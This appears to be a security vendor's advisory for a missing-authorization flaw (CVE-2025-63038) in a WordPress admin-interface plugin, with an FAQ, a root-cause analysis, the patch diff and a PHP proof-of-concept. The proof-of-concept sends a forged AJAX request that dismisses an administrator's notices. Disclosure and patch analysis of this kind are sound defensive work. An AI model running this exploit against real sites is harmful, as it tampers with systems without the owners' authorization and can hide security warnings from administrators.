What is CVE-2025-63038?

CVE-2025-63038 is a medium severity vulnerability affecting the Custom Admin Interface plugin for WordPress, specifically versions up to and including 7.40. It involves a missing authorization check that allows authenticated users to perform unauthorized actions.

How does the vulnerability work?

The vulnerability arises from a missing capability check in the `wp_custom_admin_interface_dismiss_notice` function. Authenticated attackers can manipulate a POST request to dismiss admin notices for other users by exploiting this flaw.

Who is affected by this vulnerability?

Any WordPress site using the Custom Admin Interface plugin version 7.40 or earlier is vulnerable. This includes sites where users have subscriber-level access or higher.

How can I check if my site is vulnerable?

To check if your site is vulnerable, verify the version of the Custom Admin Interface plugin installed. If it is version 7.40 or earlier, your site is at risk.

How can I fix this vulnerability?

The vulnerability is patched in version 7.41 of the Custom Admin Interface plugin. Updating to this version or later will mitigate the issue.

What does a CVSS score of 4.3 mean?

A CVSS score of 4.3 indicates a medium severity vulnerability. This means that while it is not the highest risk, it still poses a significant threat that should be addressed promptly.

What are the practical risks of this vulnerability?

Exploitation of this vulnerability allows attackers to dismiss important admin notices, potentially hiding security warnings or critical notifications from administrators, which could hinder site management.

What does the proof of concept demonstrate?

The proof of concept shows how an authenticated user can send a crafted POST request to dismiss notices for another user. This demonstrates the ease of exploiting the vulnerability if proper checks are not in place.

What are the requirements for exploiting this vulnerability?

An attacker must be authenticated with at least subscriber-level access to exploit this vulnerability. They also need a valid nonce from the plugin’s interface to perform the action.

How does the patch address the vulnerability?

The patch in version 7.41 introduces an authorization check that compares the current user’s ID with the `userId` parameter submitted in the request. This ensures that users can only dismiss notices for their own account.

What is the significance of nonce verification?

Nonce verification is a security measure to prevent CSRF attacks. While it is still included in the patched version, it alone does not prevent unauthorized actions without proper capability checks.

What should I do if I cannot update the plugin immediately?

If immediate updating is not possible, consider disabling the plugin temporarily or restricting access to the admin area until the vulnerability can be addressed.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : March 18, 2026

CVE-2025-63038: Custom Admin Interface <= 7.40 – Missing Authorization (wp-custom-admin-interface)

CVE ID CVE-2025-63038

Plugin wp-custom-admin-interface

Severity Medium (CVSS 4.3)

CWE 862

Vulnerable Version 7.40

Patched Version 7.41

Disclosed December 30, 2025

Analysis Overview

Atomic Edge analysis of CVE-2025-63038:
The Custom Admin Interface plugin for WordPress contains a missing authorization vulnerability in versions up to and including 7.40. This flaw allows authenticated attackers with subscriber-level permissions or higher to perform unauthorized actions by manipulating the admin notice dismissal function. The CVSS 4.3 score reflects a medium severity issue with low attack complexity.

Atomic Edge research identifies the root cause as a missing capability check in the `wp_custom_admin_interface_dismiss_notice` function. The vulnerable code resides in `/wp-custom-admin-interface/wp-custom-admin-interface.php` at lines 2450-2460. The function accepts a `userId` POST parameter and creates a transient without verifying the current user’s authorization to modify that specific user’s data. The function only validates a nonce but does not compare the submitted `userId` against the current user’s ID.

Exploitation requires an authenticated attacker with any WordPress role, including subscriber. The attacker sends a POST request to `/wp-admin/admin-ajax.php` with the action parameter set to `wp_custom_admin_interface_dismiss_notice`. The request must include a valid nonce obtained from the plugin’s interface and a manipulated `userId` parameter targeting another user. The payload structure is: `action=wp_custom_admin_interface_dismiss_notice&nonce=[valid_nonce]&userId=[target_user_id]`.

The patch in version 7.41 adds an authorization check before creating the transient. The fix introduces a `$current_user_id` variable retrieved via `get_current_user_id()` and compares it to the submitted `$userId`. The `set_transient` call now executes only when `$userId == $current_user_id`, preventing users from dismissing notices for other accounts. The nonce verification remains unchanged, but the authorization logic now restricts operations to the current user’s context.

Successful exploitation allows attackers to dismiss admin interface notices for arbitrary users. While this constitutes a limited privilege escalation, it could enable attackers to hide security warnings or important notifications from administrators. The impact includes unauthorized modification of user interface state and potential interference with administrative communication channels within the WordPress dashboard.

Differential between vulnerable and patched code

Code Diff

--- a/wp-custom-admin-interface/wp-custom-admin-interface.php
+++ b/wp-custom-admin-interface/wp-custom-admin-interface.php
@@ -4,7 +4,7 @@
 *		Plugin Name: WP Custom Admin Interface
 *		Plugin URI: https://www.northernbeacheswebsites.com.au
 *		Description: Customise the WordPress admin and login interfaces and customize the WordPress dashboard menu.
-*		Version: 7.40
+*		Version: 7.41
 *		Author: Martin Gibson
 *		Developer: Northern Beaches Websites
 *		Developer URI:  https://www.northernbeacheswebsites.com.au
@@ -2450,13 +2450,18 @@
     if( wp_verify_nonce( $_POST['nonce'], 'wp_custom_admin_interface_notice' ) ){

         //get user input
-        $userId = intval($_POST['userId']);
+        $userId = intval($_POST['userId']);

-        //create transient name - an stands for admin notice
-        $transientName = 'an_dismiss_'.$userId;
+        $current_user_id = intval(get_current_user_id());
+
+        if($userId == $current_user_id){
+            //create transient name - an stands for admin notice
+            $transientName = 'an_dismiss_'.$userId;
+
+            //create actual transient
+            set_transient($transientName,true,0);
+        }

-        //create actual transient
-        set_transient($transientName,true,0);
     }

     die();

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2025-63038 - Custom Admin Interface <= 7.40 - Missing Authorization
<?php

$target_url = 'https://vulnerable-site.com/wp-admin/admin-ajax.php';
$user_cookie = 'wordpress_logged_in_abc123=...'; // Authenticated session cookie
$valid_nonce = 'abc123def456'; // Nonce from plugin interface
$target_user_id = 1; // Administrator user ID to target

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query([
    'action' => 'wp_custom_admin_interface_dismiss_notice',
    'nonce' => $valid_nonce,
    'userId' => $target_user_id
]));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HTTPHEADER, [
    'Cookie: ' . $user_cookie,
    'Content-Type: application/x-www-form-urlencoded'
]);

$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

if ($http_code === 200 && $response === '') {
    echo "[+] Notice dismissal attempted for user ID: $target_user_idn";
    echo "[+] Check if transient 'an_dismiss_$target_user_id' was createdn";
} else {
    echo "[-] Exploit failed. HTTP code: $http_coden";
}

?>

Frequently Asked Questions

What is CVE-2025-63038?
Overview of the vulnerability
CVE-2025-63038 is a medium severity vulnerability affecting the Custom Admin Interface plugin for WordPress, specifically versions up to and including 7.40. It involves a missing authorization check that allows authenticated users to perform unauthorized actions.
How does the vulnerability work?
Mechanics of the exploit
The vulnerability arises from a missing capability check in the `wp_custom_admin_interface_dismiss_notice` function. Authenticated attackers can manipulate a POST request to dismiss admin notices for other users by exploiting this flaw.
Who is affected by this vulnerability?
Identifying vulnerable installations
Any WordPress site using the Custom Admin Interface plugin version 7.40 or earlier is vulnerable. This includes sites where users have subscriber-level access or higher.
How can I check if my site is vulnerable?
Verification steps
To check if your site is vulnerable, verify the version of the Custom Admin Interface plugin installed. If it is version 7.40 or earlier, your site is at risk.
How can I fix this vulnerability?
Updating the plugin
The vulnerability is patched in version 7.41 of the Custom Admin Interface plugin. Updating to this version or later will mitigate the issue.
What does a CVSS score of 4.3 mean?
Understanding the risk level
A CVSS score of 4.3 indicates a medium severity vulnerability. This means that while it is not the highest risk, it still poses a significant threat that should be addressed promptly.
What are the practical risks of this vulnerability?
Potential impacts on your site
Exploitation of this vulnerability allows attackers to dismiss important admin notices, potentially hiding security warnings or critical notifications from administrators, which could hinder site management.
What does the proof of concept demonstrate?
Illustrating the exploit
The proof of concept shows how an authenticated user can send a crafted POST request to dismiss notices for another user. This demonstrates the ease of exploiting the vulnerability if proper checks are not in place.
What are the requirements for exploiting this vulnerability?
Conditions for successful exploitation
An attacker must be authenticated with at least subscriber-level access to exploit this vulnerability. They also need a valid nonce from the plugin’s interface to perform the action.
How does the patch address the vulnerability?
Changes made in version 7.41
The patch in version 7.41 introduces an authorization check that compares the current user’s ID with the `userId` parameter submitted in the request. This ensures that users can only dismiss notices for their own account.
What is the significance of nonce verification?
Role of nonces in security
Nonce verification is a security measure to prevent CSRF attacks. While it is still included in the patched version, it alone does not prevent unauthorized actions without proper capability checks.
What should I do if I cannot update the plugin immediately?
Mitigation strategies
If immediate updating is not possible, consider disabling the plugin temporarily or restricting access to the admin area until the vulnerability can be addressed.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations